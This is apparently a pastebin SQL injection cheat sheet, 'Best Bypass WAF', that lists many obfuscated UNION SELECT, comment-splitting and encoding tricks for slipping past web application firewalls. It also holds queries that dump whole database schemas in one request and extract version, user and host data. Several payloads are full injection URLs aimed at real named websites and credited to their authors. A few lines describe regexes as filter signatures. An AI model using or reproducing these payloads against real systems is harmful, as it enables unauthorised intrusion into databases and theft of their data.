kedjaw3n

Untitled

Jan 15th, 2020
  1. ------------------------------Best Bypass WAF------------------------------------
  2. zen solution:::http://www.univcasa.ma/factualite.php?id=318999 UNIUNIONON+ALL+SELSELECTECT+1,2,3,4,5,6,7,8,9,10,11,12,CoNCat%0a(0x3c62723e3c666f6e7420636f6c6f723d5265642073697a653d333e496e6a3363743364204279205a656e3c62723e56657273696f6e203a20,version(),0x3c62723e557365722829203a20,user(),0x3c62723e4462617365203a20,dATAbASe(),(sELsELecTecT(@)frfromom(sELfromecT(@:=0x00),(sELfromecT(@)frfromom(`InFoRMAfromtiON_sCHeMa`.`ColUfromMNs`)whunionere(`TAbunionlE_sCHunionemA`=DatAbAsE())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBunionLe_nAMe,0x3a3a,coluunionmn_name))))a)),14,15,16,17%23
  3. gawd's solution::::http://www.univcasa.ma/factualite.php?id=-318++UNIunionON+ALL+SELSELECTECT+1,2,3,4,5,6,7,8,9,10,11,12,CONCAT%280x526168756c203a33,0x3c42723e,user%28%29,0x3c42723e,@@VERSION,0x3c42723e,%28SELESELECTCT%28@x%29FROFROMM%28SELESELECTCT%28@x:=0x00%29,%28@NR:=0%29,%28SELESELECTCT%280%29FROFROMM%28INFORMATIINFORMATION_SCHEMAON_SCHEMA.ColColumnsumns%29WHWHEREERE%28TABLE_STABLE_SCHEMACHEMA!=0x696e666f726d6174696f6e5f736368656d61%29AND%280x00%29IN%28@x:=CONCAT%28@x,LPAD%28@NR:=@NR%2b1,4,0x30%29,0x3a20,table_name,0x3a,column_ncolumn_nameame,0x3c62723e%29%29%29%29x%29%29,14,15,16,17--+-
  4. ashfaq bro's solution::: http://www.univcasa.ma/factualite.php?id=318 and 0 UnunionION SeLselectEct 1,2,3,4,5,6,7,8,9,0,11,12,concat('rootxx',version(),'<br>',(SeLselectEct (@x)frFROMom(SeLselectEct (@x:=0x00),(@NR:=0),(SeLselectEct (0)frFROMom(informationINFORMATION_SCHEMA_schema.TABLES)whWHEREere(tableTABLE_SCHEMA_schema!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,/*!12345Table_NSELECTamE*/,0x3c62723e))))x)),14,15,16,17--
  5. kazam gujjar :::http://www.univcasa.ma/factualite.php?id=-318888888888888+unUNIONion+ALL+seSELECTlect+1,2,3,4,5,6,7,8,9,10,11,12,concat%280x3c62723e,0x3c666f6e7420636f6c6f723d626c75652073697a653d35203e202d2d3d3d3e206b34346a3167756a6a34722068337233203c3d3d2d2d203c2f666f6e743e,0x3c62723e,0x56455253494f4e3d,version%28%29,0x3c62723e,0x555345523d,user%28%29,0x3c62723e,0x44423d,database%28%29,%20make_set%286,@:=0x0a,%28seSELECTlect%281%29frFROMom%28inINFORMATION_SCHEMAformation_schema.coCOLUMNSlumns%29whWHEREere%28taTABLE_SCHEMAble_schema!=0x696e666f726d6174696f6e5f736368656d61%29and@:=make_set%28511,@,0x3c6c693e,TaBlE_NaMe,coCOLUMN_NAMElumn_name%29%29,@%29%29,14,15,16,17--+
  6. very hard waf
  7.  
  8. http://www.geneticsandsociety.org/article.php?id=305 and true Union%A0%20%20%
  9. 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
  10. 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
  11. 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
  12. 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Select '0
  13. and false Un\ion Select c\oncat(0x3\c62723e3c666f6e7420636f6c6f723d7265643e72306f744
  14. 048335834393c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,0x3\c62723e3c
  15. 666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a203c666f6e7420636f6
  16. c6f723d677265656e3e,v\ersion(),0x3\c62723e3c666f6e7420636f6c6f723d626c75653e20446174616261
  17. 7365203a3a3a203c666f6e7420636f6c6f723d677265656e3e,d\atabase(),0x3\c62723e3c666f6e7420636f
  18. 6c6f723d626c75653e2055736572203a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,U\ser
  19. (),0x3\c62723e3c666f6e7420636f6c6f723d7265643e205461626c6573203a203c666f6e7420636f6
  20. c6f723d677265656e3e,c\oncat_ws(0x20,@:=0x00,(Select(t\able_name)fr\om(information_s\chema.
  21. t\ables)+wh\ere+(t\able_s\chema = d\atabase())+an\d@:=c\oncat_ws(0x20,@,0x3\c6c
  22. 693e3c666f6e7420636f6c6f723d7265643e,t\able_name,0x3\c2f666f6e743e)),@)),0x
  23. 32,0x33,0x34--'%20
  24.  
  25. www.itpark.am/floor.php?lang=us&build=B'and@x:=C%5CON%5CCAT(ver%5Csion(),0x3a,data%5Cbase(),0x3a3a,u%5Cs%5Cer%5C(%5C),0x3c62723e,(SELE%5CCT+GROUP_CON%5CCAT(TAB%5CLE_NA%5CME+separator+0x3c6c693e)FR%5COM+INFORMATION_S%5CCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATA%5CBASE()))UNION+SELE%5CCT+CON%5CCAT(0x273e,0x3c62723e,'~m@db100d~',@x,0x3c212d2d)%60&floor=null&go=null
  26.  
  27. [~] order by [~]
  28. /**/ORDER/**/BY/**/
  29. /*!order*/+/*!by*/
  30. /*!ORDER BY*/
  31. /*!50000ORDER BY*/
  32. /*!50000ORDER*//**//*!50000BY*/
  33. /*!12345ORDER*/+/*!BY*/
  34.  
  35. [~] UNION select [~]
  36. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  37. %55nion(%53elect 1,2,3)-- -
  38. +union+distinct+select+
  39. +union+distinctROW+select+
  40. /**//*!12345UNION SELECT*//**/
  41. /**//*!50000UNION SELECT*//**/
  42. /**/UNION/**//*!50000SELECT*//**/
  43. /*!50000UniON SeLeCt*/
  44. union /*!50000%53elect*/
  45. + #?uNiOn + #?sEleCt
  46. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  47. /*!%55NiOn*/ /*!%53eLEct*/
  48. /*!u%6eion*/ /*!se%6cect*/
  49. +un/**/ion+se/**/lect
  50. uni%0bon+se%0blect
  51. %2f**%2funion%2f**%2fselect
  52. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  53. REVERSE(noinu)+REVERSE(tceles)
  54. /*--*/union/*--*/select/*--*/
  55. union (/*!/**/ SeleCT */ 1,2,3)
  56. /*!union*/+/*!select*/
  57. union+/*!select*/
  58. /**/union/**/select/**/
  59. /**/uNIon/**/sEleCt/**/
  60. +%2F**/+Union/*!select*/
  61. /**//*!union*//**//*!select*//**/
  62. /*!uNIOn*/ /*!SelECt*/
  63. +union+distinct+select+
  64. +union+distinctROW+select+
  65. uNiOn aLl sElEcT
  66. UNIunionON+SELselectECT
  67. /**/union/*!50000select*//**/
  68. 0%a0union%a0select%09
  69. %0Aunion%0Aselect%0A
  70. %55nion/**/%53elect
  71. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  72. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  73. %0A%09UNION%0CSELECT%10NULL%
  74. /*!union*//*--*//*!all*//*--*//*!select*/
  75. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  76. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  77. +UnIoN/*&a=*/SeLeCT/*&a=*/
  78. union+sel%0bect
  79. +uni*on+sel*ect+
  80. +#1q%0Aunion all#qa%0A#%0Aselect
  81. union(select (1),(2),(3),(4),(5))
  82. UNION(SELECT(column)FROM(table))
  83. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  84. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  85. union(select(1),2,3)
  86. union (select 1111,2222,3333)
  87. uNioN (/*!/**/ SeleCT */ 11)
  88. union (select 1111,2222,3333)
  89. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  90. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  91. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  92. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  93. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  94. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  95. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  96. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
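  97. /union\sselect/g <- a filter regex, not a payload
  98. /union\s+select/i <- a filter regex, not a payload; these two look like the keyword signatures the surrounding variants are written against, so matching of this kind cannot stand in for parameterized queries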
  99. /*!UnIoN*/SeLeCT
  100. +UnIoN/*&a=*/SeLeCT/*&a=*/
  101. +uni>on+sel>ect+
  102. +(UnIoN)+(SelECT)+
  103. +(UnI)(oN)+(SeL)(EcT)
  104. +’UnI”On’+'SeL”ECT’
  105. +uni on+sel ect+
  106. +/*!UnIoN*/+/*!SeLeCt*/+
  107. /*!u%6eion*/ /*!se%6cect*/
  108. uni%20union%20/*!select*/%20
  109. union%23aa%0Aselect
  110. /**/union/*!50000select*/
  111. /^.*union.*$/ /^.*select.*$/ <- filter regexes, not a payload; apparently keyword signatures of the kind a WAF rule would use
  112. /*union*/union/*select*/select+
  113. /*uni X on*/union/*sel X ect*/
  114. +un/**/ion+sel/**/ect+
  115. +UnIOn%0d%0aSeleCt%0d%0a
  116. UNION/*&test=1*/SELECT/*&pwn=2*/
  117. un?<ion sel="">+un/**/ion+se/**/lect+
  118. +UNunionION+SEselectLECT+
  119. +uni%0bon+se%0blect+
  120. %252f%252a*/union%252f%252a /select%252f%252a*/
  121. /%2A%2A/union/%2A%2A/select/%2A%2A/
  122. %2f**%2funion%2f**%2fselect%2f**%2f
  123. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  124. /*!UnIoN*/SeLecT+
  125.  
  126. [~] information_schema.tables [~]
  127. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  128. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  129. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  130. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  131. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  132. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  133.  
  134. [~] concat() [~]
  135. CoNcAt()
  136. concat()
  137. CON%08CAT()
  138. CoNcAt()
  139. %0AcOnCat()
  140. /**//*!12345cOnCat*/
  141. /*!50000cOnCat*/(/*!*/)
  142. unhex(hex(concat(table_name)))
  143. unhex(hex(/*!12345concat*/(table_name)))
  144. unhex(hex(/*!50000concat*/(table_name)))
  145.  
  146. [~] group_concat() [~]
  147. /*!group_concat*/()
  148. gRoUp_cOnCAt()
  149. group_concat(/*!*/)
  150. group_concat(/*!12345table_name*/)
  151. group_concat(/*!50000table_name*/)
  152. /*!group_concat*/(/*!12345table_name*/)
  153. /*!group_concat*/(/*!50000table_name*/)
  154. /*!12345group_concat*/(/*!12345table_name*/)
  155. /*!50000group_concat*/(/*!50000table_name*/)
  156. /*!GrOuP_ConCaT*/()
  157. /*!12345GroUP_ConCat*/()
  158. /*!50000gRouP_cOnCaT*/()
  159. /*!50000Gr%6fuP_c%6fnCAT*/()
  160. unhex(hex(group_concat(table_name)))
  161. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  162. unhex(hex(/*!12345group_concat*/(table_name)))
  163. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  164. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  165. unhex(hex(/*!50000group_concat*/(table_name)))
  166. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  167. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  168. convert(group_concat(table_name)+using+ascii)
  169. convert(group_concat(/*!table_name*/)+using+ascii)
  170. convert(group_concat(/*!12345table_name*/)+using+ascii)
  171. convert(group_concat(/*!50000table_name*/)+using+ascii)
  172. CONVERT(group_concat(table_name)+USING+latin1)
  173. CONVERT(group_concat(table_name)+USING+latin2)
  174. CONVERT(group_concat(table_name)+USING+latin3)
  175. CONVERT(group_concat(table_name)+USING+latin4)
  176. CONVERT(group_concat(table_name)+USING+latin5)
  177.  
  178. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  179. +div+0
  180. Having+1=0
  181. +AND+1=0
  182. +/*!and*/+1=0
  183. and(1)=(0)
  184.  
  185. --'- : +--+ / : -- - : --+- : /*
  186. ) order by 1-- -
  187. ') order by 1-- -
  188. ')order by 1%23%23
  189. %')order by 1%23%23
  190. Null' order by 100--+
  191. Null' order by 9999--+
  192. ')group by 99-- -
  193. 'group by 119449-- -
  194. 'group/**/by/**/99%23%23
  195. union select ByPassing method
  196. +union+distinct+select+
  197. +union+distinctROW+select+
  198. /**//*!12345UNION SELECT*//**/
  199. /**//*!50000UNION SELECT*//**/
  200. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  201. +/*!u%6eion*/+/*!se%6cect*/+
  202. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  203. 1%')and(0)union(select(1),version(),3,4,5,6)%
  204. 23%23%23
  205. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  206. union /*!50000%53elect*/
  207. %55nion %53elect
  208. +--+Union+--+Select+--+
  209. +UnIoN/*&a=*/SeLeCT/*&a=*/
  210. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  211. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  212. UnIoN SeLeCt CoNcAt(version())--
  213. uNiOn aLl sElEcT
  214. uUNIONnion all sSELECTelect
  215. ==============================
  216. ==============================
  217. ==============================
  218. =========================================
  219. :: Buffer Overflow ::
  220. ==============================
  221. ==============================
  222. ==============================
  223. =========================================
  224. +And(select 1)=(select 0×414)+union+select+1–
  225. +And(select 1)=(select 0xAAAA)+union+select
  226. +1–
  227. +And(select 1)=(select 0×4141414141414
  228. 141414141414141414141414141414
  229. 141414141414141414141414141414
  230. 141414141414141414141414141414
  231. 141414141414141414141414141414
  232. 14141414141414141414 141414141414141
  233. 414141414141414141414141414141
  234. 41414141414141414141414141414141414
  235. 141414141414141414141414141414
  236. 141414141414141414141414141414
  237. 14141414141414141414 141414141414141
  238. 414141414141414141414141414141
  239. 41414141414141414141414141414141414
  240. 141414141414141414141414141414
  241. 141414141414141414141414141414
  242. 14141414141414141414 141414141414141
  243. 414141414141414141414141414141
  244. 41414141414141414141414141414141414
  245. 141414141414141414141414141414
  246. 141414141414141414141414141414
  247. 14141414141414141414 141414141414141
  248. 414141414141414141414141414141
  249. 41414141414141414141414141414141414
  250. 1414141)+
  251. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  252. ==============================
  253. ==============================
  254. ==============================
  255. ========================================
  256. :: 400 Bad Request ::
  257. ==============================
  258. ==============================
  259. ==============================
  260. ========================================
  261. –+%0A
  262. union+select+1–+%0A,2–+%0A,3–+%0A,4–+
  263. %0A,5–+%0A –
  264. ==============================
  265. ==============================
  266. ==============================
  267. ========================================
  268. null the parameter
  269. ==============================
  270. ==============================
  271. ==============================
  272. ========================================
  273. id=-1
  274. id=null
  275. id=1+and+false+
  276. id=9999
  277. id=1 and 0
  278. id==1
  279. id=(-1)
  280. ==============================
  281. ==============================
  282. ==============================
  283. ==============================
  284. ===============
  285. Group_Concat
  286. ==============================
  287. ==============================
  288. ==============================
  289. ==============================
  290. ===============
  291. Group_Concat
  292. group_concat()
  293. /*!group_concat*/()
  294. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  295. group_concat(,0x3c62723e)
  296. g%72oup_c%6Fncat%28%76%65rsion%28%29,
  297. %22~BlackRose%22%29
  298. CoNcAt()
  299. CONCAT(DISTINCT Version())
  300. concat(,0x3a,)
  301. concat%00()
  302. %00CoNcAt()
  303. /*!50000cOnCat*/(/*!Version()*/)
  304. /*!50000cOnCat*/
  305. /**//*!12345cOnCat*/(,0x3a,)
  306. concat_ws()
  307. concat(0x3a,,0x3c62723e)
  308. /*!concat_ws(0x3a,)*/
  309. concat_ws(0x3a3a3a,version()
  310. CONCAT_WS(CHAR(32,58,32),version(),)
  311. REVERSE(tacnoc)
  312. binary(version())
  313. uncompress(compress(version()))
  314. aes_decrypt(aes_encrypt(version(),1),1)
  315. ==============================
  316. ==============================
  317. ==============================
  318. ==============================
  319. ============
  320. To make the column number appear in the page, put after id
  321. ==============================
  322. ==============================
  323. ==============================
  324. ==============================
  325. ============
  326. id=1+and+1=0+union+select+1,2,3,4,5,6
  327. +AND+1=0
  328. /*!aND*/ 1 like 0
  329. +/*!and*/+1=0
  330. +and+2>3+
  331. +and(1)=(0)
  332. and (1)!=(0)
  333. +div+0
  334. Having+1=0
  335. ==============================
  336. ==============================
  337. ==============================
  338. =========================================
  339. function ByPassing
  340. ==============================
  341. ==============================
  342. ==============================
  343. =========================================
  344. unhex(hex(value))
  345. cast(value as char)
  346. uncompress(compress(version()))
  347. cast(version() as char)
  348. aes_decrypt(aes_encrypt(version(),1),1)
  349. binary(version())
  350. convert(value using ascii)
  351. ==============================
  352. ==============================
  353. ==============================
  354. =========================================
  355. avoid source page injection
  356. ==============================
  357. ==============================
  358. ==============================
  359. =========================================
  360. concat(?”>,<br><br><br>,@@version,?<img
  361. src=”,?<?’#)
  362. “><br>? <img src=”
  363. <img src=””/>injection<img src=”
  364. concat(0x223e,@@version)
  365. concat(0x273e27,version(),0x3c212d2d)
  366. concat(0x223e3c62723e,version
  367. (),0x3c696d67207372633d22)
  368. concat(0x223e,@@version,0x3c69
  369. 6d67207372633d22)
  370. concat(0x223e,0x3c62723e3c6272
  371. 3e3c62723e,@@version,0x3c696d6
  372. 7207372633d22,0x3c62723e)
  373. concat(0x223e3c62723e,@@versio
  374. n,0x3a,”BlackRose”,0x3c696d67207372633d22)
  375. concat(‘</title>’,@@version,’<title>’)
  376. concat(0x273c2f7469746c653e27,
  377. @@version,0x273c7469746c653e27)
  378. concat(0x273c2f7469746c653e27,version
  379. (),0x273c7469746c653e27)
  380. ==============================
  381. ==============================
  382. ==============================
  383. =========================================
  384. get version – DB_NAME – user – HOST_NAME –
  385. datadir
  386. ==============================
  387. ==============================
  388. ==============================
  389. =========================================
  390. version()
  391. convert(version() using latin1)
  392. unhex(hex(version()))
  393. @@GLOBAL.VERSION
  394. (substr(@@version,1,1)=5) :: 1 true 0 false
  395. # like #
  396. http://www.marinaplast.com/page.php?id=-13
  397. union select 1,2,(substr(@@version,1,1)=5),4,5 –
  398. ==============================
  399. ==============================
  400. ==============================
  401. ========================================
  402. +and substring(version(),1,1)=4
  403. +and substring(version(),1,1)=5
  404. +and substring(version(),1,1)=9
  405. +and substring(version(),1,1)=10
  406. id=1 /*!50094aaaa*/ error
  407. id=1 /*!50095aaaa*/ no error
  408. id=1 /*!50096aaaa*/ error
  409. # like # http://www.marinaplast.com/page.php?
  410. id=13 /*!50095aaaa*/
  411. id=1 /*!40123 1=1*/–+- no error
  412. id=1 /*!40122rrrr*/ no error
  413. # like # http://www.marinaplast.com/page.php?
  414. id=13 /*!40122rrrr*/ error not v4
  415. ==============================
  416. ==============================
  417. ==============================
  418. =======================================
  419. DB_NAME()
  420. ==============================
  421. ==============================
  422. ==============================
  423. =======================================
  424. @@database
  425. database()
  426. id=vv()
  427. # like # http://www.marinaplast.com/page.php?
  428. id=-13 union select 1,2,DB_NAME(),4,5 –
  429. http://www.marinaplast.com/page.php?id=vv()
  430. @@user
  431. user()
  432. user_name()
  433. system_user()
  434. # like # http://www.marinaplast.com/page.php?
  435. id=-13 union select 1,2,user(),4,5 –
  436. HOST_NAME()
  437. @@hostname
  438. @@servername
  439. SERVERPROPERTY()
  440. # like # http://www.marinaplast.com/page.php?
  441. id=-13 union select 1,2,HOST_NAME(),4,5 –
  442. @@datadir
  443. datadir()
  444. # like # http://www.marinaplast.com/page.php?
  445. id=-13 union select 1,2,datadir(),4,5 –
  446. ASPX
  447. and 1=0/@@version
  448. ‘ and 1=0/@@version;–
  449. ‘) and 1=@@version–
  450. and 1=0/user;–
  451. Requested method
  452. [DUMP DB in 1 Request]
  453. (select (@) from (select(@:=0×00),(select (@)
  454. from (information_schema.columns) where
  455. (table_schema>=@) and (@)in (@:=concat(@,0x
  456. 0a,’ [ ',table_schema,' ] >’,table_name,’ >
  457. ‘,column_name))))x)
  458. (select(@) from (select (@:=0×00),(select (@)
  459. from (table) where (@) in (@:=concat(@,0x
  460. 0a,column1,0x3a,column2))))a)
  461. ==============================
  462. ==============================
  463. ==============================
  464. =========================================
  465. [DUMP DB in 1 Request improve]
  466. ==============================
  467. ==============================
  468. ==============================
  469. =========================================
  470. (select(@x)from(select(@x:=0×00),(select(0)fr
  471. om(information_schema.columns)where
  472. (table_schema!=0x696e666f726d6174696f6e5
  473. f736368656d61)and(0×00)in(@x:=concat
  474. (@x,0x3c62723e,table_schema,0x2e,table_
  475. name,0x3a,column_name))))x)
  476. like
  477. http://www.marinaplast.com/page.php?id=-13
  478. union select 1,2,(select(@x)from(select(@x:
  479. =0×00),(select(0)from(information_schema.colu
  480. mns)where(table_schema!=0x696e
  481. 666f726d6174696f6e5f736368656d61)and
  482. (0×00)in(@x:=c oncat(@x,0x3c62
  483. 723e,table_schema,0x2e,table_n
  484. ame,0x3a,column_name))))x),4,5 –
  485. ==============================
  486. ==============================
  487. ==============================
  488. =========================================
  489. #2#
  490. ==============================
  491. ==============================
  492. ==============================
  493. =========================================
  494. method like DUMP DB in 1 Request
  495. ==============================
  496. ==============================
  497. ==============================
  498. =========================================
  499. concat(@i:=0×00,@o:=0xd0a,benchmark
  500. (40,@o:=CONCAT( @o,0xd0a,(SELECT concat
  501. (table_schema,0x2E,@i:=table_name) FROM
  502. information_schema.tables WHERE
  503. table_name>@i order by table_name LIMIT 1)))
  504. like
  505. http://www.mishnetorah.com/shop/details.php?
  506. id=-26+union+select+1,2,3,concat
  507. (@i:=0×00,@o:=0xd0a,benchmark(
  508. 40,@o:=CONCAT(@o,0xd0a ,(SELECT concat
  509. (table_schema,0x2E,@i:=table_name) FROM
  510. information_schema.tables WHERE
  511. table_name>@i order by table_name LIMIT
  512. 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,
  513. 16,17,18,19,20,21
  514. ==============================
  515. ==============================
  516. ==============================
  517. =========================================
  518. #3#
  519. ==============================
  520. ==============================
  521. ==============================
  522. =========================================
  523. databases
  524. (select+count(schema_name) +from+informati
  525. on_schema.schemata)
  526. # like #
  527. http://www.marinaplast.com/page.php?id=-13
  528. union select 1,2,(select+count(schema_name)
  529. +from+information_schema.schemata),4,5 –
  530. tables
  531. (select+count(table_name) +from+informati
  532. on_schema.tables)
  533. # like #
  534. http://www.marinaplast.com/page.php?id=-13
  535. union select 1,2,(select+count(table_name) +from
  536. +information_schema.tables),4,5 –
  537. columns
  538. (select+count(column_name) +from+informati
  539. on_schema.columns)
  540. # like #
  541. http://www.marinaplast.com/page.php?id=-13
  542. union select 1,2,(select+count(column_name)
  543. +from+information_schema.columns),4,5 –
  544. ==============================
  545. ==============================
  546. ==============================
  547. =========================================
  548. #4#
  549. ==============================
  550. ==============================
  551. ==============================
  552. =========================================
  553. show the table with all its columns
  554. CONCAT(table_name,0x3e,GROUP_CONCAT
  555. (column_name))
  556. +FROM information_schema.columns WHERE
  557. table_schema=database() GROUP BY table_name
  558. LIMIT 1,1–+
  559. like
  560. http://www.marinaplast.com/page.php?id=-13
  561. union select 1,2,CONCAT(table_name,0x3e,GRO
  562. UP_CONCAT(column_name)),4,5 +FROM
  563. information_schema.columns WHERE
  564. table_schema=database() GROUP BY table_name
  565. LIMIT 0,1–+
  566. ==============================
  567. ==============================
  568. ==============================
  569. =========================================
  570. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAA
  571. AAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  572. ==============================
  573. ==============================
  574. ==============================
  575. =========================================
  576. filtered request
  577. # tables #
  578. group_concat(/*!table_name*/)
  579. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  580. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!
  581. WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  582. /*!From*/+%69nformation_schema./**/tAblES+/
  583. *!50000Where*/+/*!%54able_ScHEmA*/=schEMA
  584. ()– -
  585. ==============================
  586. ==============================
  587. ==============================
  588. =========================================
  589. # columns #
  590. ==============================
  591. ==============================
  592. ==============================
  593. =========================================
  594. group_concat(/*!column_name*/)
  595. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!
  596. WheRe*/ /*!tAblE_naMe*/=hex table
  597. /*!From*/+%69nformation_schema./**/columns
  598. +/*!50000Where*/+/*!%54able_name*/=hex
  599. table
  600. /*!froM*/ table– -
  601. ==============================
  602. ==============================
  603. ==============================
  604. =========================================
  605. #6#
  606. ==============================
  607. ==============================
  608. ==============================
  609. =========================================
  610. bypass method
  611. (select+group_concat(/*!table_name*/)+/*!
  612. From*/+%69nformation_schema./**/tAblES+/*!
  613. 50000Where*/+/*!%54able_ScHEmA*/=schEMA
  614. ())
  615. (select+group_concat(/*!column_name*/)+/*!
  616. From*/+%69nformation_schema./**/columns+/*!
  617. 50000Where*/+/*!%54able_name*/=hex table)
  618. like
  619. http://www.marinaplast.com/page.php?id=-13
  620. union select 1,2,(select+group_concat(/*!
  621. table_name*/)+/*!From*/+%69nformation_s
  622. chema./**/tAblES+/*!50000Where*/+/*!
  623. %54able_ScHEmA*/=schEMA()),4,5 –
  624. ==============================
  625. ==============================
  626. ==============================
  627. =========================================
  628. #7#
  629. ==============================
  630. ==============================
  631. ==============================
  632. =========================================
  633. bypass method
  634. unhex(hex(Concat(Column_Name,0
  635. x3e,Table_schema,0x3e,table_Name)))
  636. /*!from*/information_schema.columns/*!where*/
  637. column_name%20/*!like*/char(37,%20112,%
  638. 2097,%20115,%20115,%2037)
  639. like
  640. http://www.marinaplast.com/page.php?id=-13
  641. union select 1,2,unhex(hex(Concat(Column_Na
  642. me,0x3e,Table_schema,0x3e,tabl
  643. e_Name))),4,5 /*!from*/information_sche
  644. ma.columns/*!where*/column_name%20/*!like*/
  645. char(37,%20112,%2097,%20115,%20115,
  646. %2037)–
  647. ==============================
  648. ==============================
  649. ==============================
  650. =========================================
  651. [+] Union Select:
  652. ==============================
  653. ==============================
  654. ==============================
  655. =========================================
  656. union /*!select*/+
  657. union/**/select/**/
  658. /**/union/**/select/**/
  659. /**/union/*!50000select*/
  660. /**//*!12345UNION SELECT*//**/
  661. /**//*!50000UNION SELECT*//**/
  662. /**/uniUNIONon/**/selSELECTect/**/
  663. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  664. /**//*!union*//**//*!select*//**/
  665. /**/UNunionION/**/SELselectECT/**/
  666. /**//*UnIOn*//**//*SEleCt*//**/
  667. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//
  668. *l*//*e*//*C*//*t*//**/
  669. /**/UNunionION/**/all/**/SELselectECT/**/
  670. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  671. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//
  672. *S*//*E*//*l*//*e*//*C*//*t*//**/
  673. uni<on all sel<ect
  674. %20union%20/*!select*/%20
  675. union%23aa%0Aselect
  676. union+distinct+select+
  677. union+distinctROW+select+
  678. /*!20000%0d%0aunion*/+/*!20000%0d%0aSel
  679. Ect*/
  680. %252f%252a*/UNION%252f%252a /SELECT
  681. %252f%252a*/
  682. %23sexsexsex%0AUnIOn%23sexsexsex
  683. %0ASeLecT+
  684. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  685. /*!u%6eion*/+/*!se%6cect*/+
  686. 1%’)and(0)union(select(1),version(),3,4,5,6)%
  687. 23%23%23
  688. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  689. union /*!50000%53elect*/
  690. +%2F**/+Union/*!select*/
  691. %55nion %53elect
  692. +–+Union+–+Select+–+
  693. +UnIoN/*&a=*/SeLeCT/*&a=*/
  694. uNiOn aLl sElEcT
  695. uUNIONnion all sSELECTelect
  696. union(select(1),2,3)
  697. union (select 1111,2222,3333)
  698. union (/*!/**/ SeleCT */ 11)
  699. %0A%09UNION%0CSELECT%10NULL%
  700. /*!union*//*–*//*!all*//*–*//*!select*/
  701. union%23foo*%2F*bar%0D%0Aselect%23foo
  702. %0D%0A1% 2C2%2C
  703. union+sel%0bect
  704. +uni*on+sel*ect+
  705. + #1q %0Aunion all#qa%0A#%0Aselect
  706. 1,2,3,4,5,6,7,8,9,10%0A#a
  707. union(select (1),(2),(3),(4),(5))
  708. UNION(SELECT(column)FROM(table))
  709. id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
  710. id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
  711. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  712. ==============================
  713. ==============================
  714. ==============================
  715. =========================================
  716. [+] Buffer overflow:
  717. ==============================
  718. ==============================
  719. ==============================
  720. =========================================
  721. +And(select 1)=(select 0×414)+union+select+1–
